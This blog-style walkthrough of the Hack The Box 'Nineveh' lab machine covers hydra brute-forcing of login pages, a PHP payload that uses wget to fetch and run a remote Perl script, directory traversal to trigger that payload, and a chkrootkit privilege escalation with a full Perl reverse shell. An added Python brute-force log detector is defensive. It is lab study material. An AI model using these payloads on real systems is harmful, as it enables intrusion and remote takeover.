Thursday, 1 November 2018

Hack The Box : Nineveh Hacking Challenge Walkthrough




Nineveh is a machine on the HackTheBox platform. It is an intermediate-level challenge, and you will have to think outside the box to root it.
Machine: Nineveh
OS: Linux
Target IP: 10.10.10.43
Let's begin by enumerating the services running on this box.
Since ports 80 and 443 are open, I used dirb to enumerate directories and found several pages, but I would like to concentrate on these two:
https://10.10.10.43/db (this path also contained a phpLiteAdmin login page)
https://10.10.10.43/department/login.php
Here is the department login page:


Using hydra we can brute-force this page as follows:
root@kali:~# hydra 10.10.10.43 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"

You might be wondering how I discovered that the username is admin.
The login page gave a hint. If you enter any other username, an "invalid username" message is shown,
but if you enter admin, the "invalid password" message is displayed instead. This is a simple way to confirm a valid username.
The brute-force attack was successful and returned the following credentials:
Username: admin
Password: 1q2w3e4r5t
I logged in using these credentials and got this page:
The other directory that interested me is /db, which prompted for a password:
https://10.10.10.43/db
I brute-forced this with hydra as well and obtained the admin password: password123
I logged in and found a panel that allowed me to create a database.
I created a new database named "ninevehNotes.php" and noted that it was stored in the directory /var/tmp. This is the path we will use to execute the arbitrary command.
Now we can create a table and inject <?php system("wget -O /tmp/shell.pl http://10.10.14.34:1234/shell.pl;perl /tmp/shell.pl"); ?> into one of the fields.
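Both hydra runs above (against /department/login.php and /db) leave a distinctive trace in the web server's access log: a burst of POST requests to one login path from one source. As an added, defender-side example that is not part of the original post, the Python below parses combined-format access-log lines and flags any source whose POSTs to a watched login path exceed a threshold inside a sliding window. The log lines are constructed samples, and the watched paths, window and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: host ident user [time] "method path proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Login endpoints on this box (assumed paths); /db/ fronts the phpLiteAdmin login form
LOGIN_PATHS = ("/department/login.php", "/db/")

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m.group("ip"), "method": m.group("method"), "status": int(m.group("status")),
            "path": m.group("path").split("?")[0],
            "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")}

def find_bruteforce(lines, window=timedelta(seconds=60), threshold=10):
    """Return {(ip, path): peak} for sources whose POSTs to a login path exceed
    `threshold` inside any sliding `window`; peak is the largest count seen."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith(LOGIN_PATHS):
            attempts[(rec["ip"], rec["path"])].append(rec["ts"])
    alerts = {}
    for key, stamps in attempts.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:  # drop attempts older than the window
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            alerts[key] = peak
    return alerts

# Constructed sample: 12 wordlist attempts in 12 seconds from one host, plus a normal user
SAMPLE_LOG = [
    f'10.10.14.34 - - [01/Nov/2018:10:15:{s:02d} +0000] "POST /department/login.php HTTP/1.1" 200 1045 "-" "Mozilla/5.0"'
    for s in range(12)
] + [
    '10.10.14.50 - - [01/Nov/2018:10:15:05 +0000] "POST /department/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.10.14.50 - - [01/Nov/2018:10:21:00 +0000] "GET /department/manage.php?notes=notes.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
if __name__ == "__main__":
    for (ip, path), n in find_bruteforce(SAMPLE_LOG).items():
        print(f"possible brute force: {ip} -> {path} ({n} POSTs within 60s)")
```

The same counter applied to 401 responses catches brute force against a Basic-auth protected path such as /db if that front-end uses HTTP authentication instead of a form.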
Remember that we noticed http://10.10.10.43/department/login.php in our dirb search.
Now we will use directory traversal in that page to trigger the payload by requesting http://10.10.10.43/department/manage.php?notes=ninevehNotes.php
I opened a netcat listener on port 80 using nc -nlvp 1234 to get the shell back from the victim,
and that's how I got a www-data shell.
Now we can try to escalate our privileges.
I did some enumeration on the system and found an image named nineveh.png in /var/www/ssl/secure_notes. The following private key was embedded in the metadata:
strings -n 8 nineveh.png
00000000000
13126060277
www-data
www-data
secret/nineveh.priv
00000003213
13126045656
www-data
www-data
-----BEGIN RSA PRIVATE KEY-----
[private key material omitted]
-----END RSA PRIVATE KEY-----
secret/nineveh.pub
00000000620
13126060277
www-data
www-data
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb
I saved the RSA private key in the file id_rsa and transferred it to the victim using wget. I used netstat to check whether the victim was listening for an SSH connection.
ssh -o StrictHostKeyChecking=no -i id_rsa amrois@nineveh.htb
I was successfully able to log in as amrois and read the user flag.
In the amrois home directory, I listed all the files as follows:
In the list there is a report owned by user amrois. Reports were being generated repeatedly, which is an indication of a cron job running on the system.
I did some research and discovered that the output was generated by the chkrootkit command, which is vulnerable.
I used the following Perl reverse shell script to exploit chkrootkit:
#!/usr/bin/perl
use Socket;
$i="10.10.14.34";
$p=9999;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){
    open(STDIN,">&S");
    open(STDOUT,">&S");
    open(STDERR,">&S");
    exec("/bin/sh -i");
};
I listened for a reverse connection using netcat and got a root shell.

Final thoughts:

I enjoyed injecting code through the database table since it's not a very common approach. Also, taking advantage of chkrootkit and the constantly generated reports made for an interesting root.
